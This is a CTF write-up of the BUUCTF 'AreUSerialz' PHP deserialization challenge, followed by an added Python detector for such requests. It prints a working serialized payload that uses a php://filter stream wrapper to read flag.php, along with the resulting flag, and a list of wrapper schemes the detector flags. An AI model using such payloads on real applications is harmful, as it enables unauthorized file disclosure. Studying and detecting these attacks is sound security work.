BUUCTF breakthrough diary -- [Wangding Cup 2020 Qinglong Group] AreUSerialz
2022-07-22 21:01:00 【Breeze--】
I finally solved a deserialization challenge, and maybe I understand deserialization a little now.
I am writing down my own understanding here.
Enter the page.
For deserialization, let's first look at the key code:
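// Entry point: the str parameter is deserialized only if is_valid() accepts it.
// The curly-brace offset $_GET{'str'} is kept as in the challenge source; this syntax was removed in PHP 8.
if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}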
I won't explain the rest; look directly at
if(is_valid($str)) // This is the code to be analyzed
This is the is_valid function:
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
You can see that it checks every incoming character and makes sure it is a printable character (ord value from 32 to 125).
After that check, the string is deserialized directly.
Then go back to the class and see how to get it to output our flag:
public function process() {
    if($this->op == "1") {
        $this->write();
    } else if($this->op == "2") {
        $res = $this->read();
        $this->output($res);
    } else {
        $this->output("Bad Hacker!");
    }
}
private function output($s) {
    echo "[Result]: <br>";
    echo $s;
}
You can see that the output happens here, so we now have to satisfy op==2.
So I changed $op above to 2.
What gets output? It has to be the flag we want, so the goal now is to make $res hold the flag.
Because this branch calls the read() method, let's take a look at read():
private function read() {
    $res = "";
    if(isset($this->filename)) {
        $res = file_get_contents($this->filename);
    }
    return $res;
}
You can see that file_get_contents assigns its result to $res, so you can't simply set $res=flag.
We need to use a pseudo-protocol (a PHP stream wrapper), because file_get_contents reads a path or URL.
So we set $filename="php://filter/read=convert.base64-encode/resource=flag.php";
So change the first three lines of the class to this:
protected $op=2;
protected $filename="php://filter/read=convert.base64-encode/resource=flag.php";
protected $content;
Then serialize it locally.
This is the result:
O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:10:"*content";N;}
Submitting this fails. This is because protected is a non-public property, and deserializing it directly causes problems.
This is the serialized format of a protected property (\00 is the problem: it is a NUL byte, ord value 0, which is displayed as blank and falls outside the 32 to 125 range that is_valid accepts):
data type:property name length:"\00*\00property name";data type:property value length:"property value";
So we need to change the property visibility to public (don't change it to private, which is also a non-public property).
Change it to:
public $op=2;
public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
public $content;
Then serialize to get the result we want
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;}
Submit it and get the base64-encoded flag.
After decoding:
<?php $flag='flag{a5b5f442-946d-4bc2-8eb4-b587ec1cb4f2}';
The flag is
flag{a5b5f442-946d-4bc2-8eb4-b587ec1cb4f2}
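From the defender's side, the printable-character filter does not stop the public-property payload, so the request itself is worth inspecting. The following Python sketch is an added example, not part of the original post or the challenge code: it re-implements is_valid, walks the s:<len>:"..." items of the str parameter, and flags serialized objects and stream-wrapper filenames. The function names, the wrapper list and the sample URLs are assumptions constructed for illustration, and the length handling assumes ASCII payloads.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Wrapper schemes that a client-supplied filename should never start with (assumed list).
WRAPPERS = ("php://", "phar://", "data://", "expect://", "zip://")
OBJECT_RE = re.compile(r'[OC]:\d+:"([A-Za-z_\\][\w\\]*)":\d+:')
STRING_RE = re.compile(r's:(\d+):"')

def is_valid(s):
    """Python rendering of the page's is_valid(): every character in 32..125."""
    return all(32 <= ord(c) <= 125 for c in s)

def serialized_strings(payload):
    """Yield the value of each s:<len>:"<value>"; item, using the declared length."""
    pos = 0
    while (m := STRING_RE.search(payload, pos)):
        end = m.end() + int(m.group(1))
        if payload[end:end + 2] == '";':   # well-formed item: closed right after <len> chars
            yield payload[m.end():end]
            pos = end + 2
        else:
            pos = m.end()

def inspect_request(url, param="str"):
    """Return (kind, detail) findings for one request URL; [] means nothing matched."""
    findings = []
    for value in parse_qs(urlsplit(url).query).get(param, []):
        findings += [("object", cls) for cls in OBJECT_RE.findall(value)]
        findings += [("wrapper", s) for s in serialized_strings(value)
                     if s.lower().startswith(WRAPPERS)]
    return findings

# Constructed sample requests; the first carries the public-property payload shown on this page.
PAYLOAD = ('O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/'
           'read=convert.base64-encode/resource=flag.php";s:7:"content";N;}')
SAMPLE_URLS = [
    "/index.php?str=" + quote(PAYLOAD, safe=""),
    "/index.php?str=hello",
    "/index.php?str=" + quote('a:1:{s:4:"name";s:3:"bob";}', safe=""),
]

if __name__ == "__main__":
    print("passes is_valid:", is_valid(PAYLOAD))
    for url in SAMPLE_URLS:
        print(inspect_request(url) or "clean", "<-", url[:40])
```

The payload passes is_valid yet produces both an object finding and a wrapper finding, which is why a character filter in front of unserialize() is not a sufficient control.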